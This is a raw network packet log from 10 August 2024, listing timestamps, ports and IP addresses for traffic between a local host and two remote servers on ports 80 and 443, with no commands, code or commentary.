Aug 10, 2024 16:12:24.854654074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.854717016 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.854743004 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.854769945 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.854803085 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.854851007 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.854866982 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.854886055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.854907036 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.854919910 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.854952097 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.854984999 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855021000 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855022907 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.855022907 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.855022907 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.855062962 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.855068922 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855118036 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855149984 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855184078 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855202913 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.855202913 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.855233908 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855243921 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.855283022 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855313063 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855348110 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855353117 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.855360031 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.855379105 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855432987 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855464935 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855498075 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855505943 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.855505943 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.855505943 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.855545998 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855577946 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855591059 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.855627060 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855638027 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.855676889 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855707884 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855710983 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.855740070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855771065 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855775118 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.855776072 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.855803013 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855881929 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855885029 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.855885029 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.855931044 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855962992 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.855995893 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.856026888 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.856056929 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.856056929 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.856056929 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.856065989 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.856080055 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.856096983 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.856149912 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.856199980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.856241941 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.856241941 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.856241941 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.856249094 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.856276989 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.856326103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.856357098 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.856374979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.856405973 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.856427908 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.856437922 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.856503963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.856504917 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.856575012 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.856723070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.856755972 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.856790066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.856796026 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.856822014 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.856838942 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.856838942 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.856853962 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.856868982 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.856884956 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.856955051 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.856959105 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.856987000 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857018948 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857034922 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.857034922 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.857049942 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857084036 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857116938 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.857116938 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.857119083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857170105 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857181072 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.857218027 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857249975 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857269049 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.857280016 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857330084 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.857331038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857381105 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857403994 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.857413054 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857446909 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857476950 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857510090 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857541084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857561111 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.857561111 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.857561111 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.857573032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857597113 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.857604980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857635975 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857636929 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.857666016 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857697964 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857728958 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857731104 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.857731104 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.857759953 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857790947 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857821941 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857831001 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.857831001 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.857831001 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.857831001 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.857853889 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857906103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857922077 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.857937098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857968092 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.857990026 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.858047009 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858082056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858105898 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.858113050 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858144999 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858175993 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858206987 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858238935 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858244896 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.858244896 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.858269930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858300924 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858331919 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858336926 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.858336926 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.858336926 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.858336926 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.858362913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858396053 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858405113 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.858427048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858458996 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858460903 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.858473063 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.858489037 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858520985 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858551979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858563900 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.858563900 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.858584881 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858606100 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.858606100 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.858616114 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858714104 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858726978 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.858746052 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858778000 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858808994 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858840942 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858854055 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.858854055 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.858854055 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.858855009 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.858870983 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858903885 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858935118 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858942986 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.858967066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.858998060 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.859030962 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.859158993 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.859159946 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.859159946 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.884238005 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.884257078 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.884356022 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.884356022 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.884362936 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.884522915 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.889113903 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.889146090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.889168024 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.889178991 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.889199018 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.889213085 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.889244080 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.889262915 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.889277935 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.889281988 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.889311075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.893043041 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.909715891 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.909735918 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.909799099 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.909805059 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.909950018 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.909987926 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.909996986 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.910048008 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.910048008 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.910063982 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.910080910 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.910160065 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.910162926 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.910300016 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.910461903 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.910479069 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.910531044 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.910537958 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.910609961 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.910609961 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.910959005 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.910975933 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.911020041 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.911024094 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.911108971 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.911108971 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.911613941 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.911631107 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.911701918 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.911708117 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.911737919 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.911899090 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.912712097 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.912727118 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.912775040 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.912779093 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.912934065 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.926100969 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.926156044 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.926423073 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.926438093 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.926450968 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.926464081 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.926469088 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.926477909 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.926491022 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.926491022 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.926505089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.926510096 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.926518917 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.926532030 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.926532984 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.926544905 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.926548958 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.926559925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.926573038 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.926573992 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.926589012 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.926592112 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.926614046 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.926625013 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.927221060 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.927234888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.927248955 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.927262068 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.927265882 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.927274942 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.927282095 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.927288055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.927301884 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.927309036 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.927314997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.927316904 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.927340984 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.927349091 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.927735090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.927747965 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.927762985 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.927781105 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.927787066 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.927789927 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.927797079 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.927800894 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.927815914 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.927820921 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.927831888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.927851915 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.927872896 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.928222895 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.928236961 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.928251028 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.928266048 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.928278923 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.928286076 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.928301096 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.928314924 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.928330898 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.928344965 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.928359985 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.928369045 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.928391933 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.928406000 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.928456068 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.928468943 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.928488016 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.928497076 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.928512096 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.928525925 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.928525925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.928539991 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.928546906 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.928555012 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.928561926 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.928570032 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.928576946 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.928586960 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.928606987 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.929198027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.929212093 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.929225922 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.929241896 CEST	49739	80	192.168.2.4	147.45.44.104
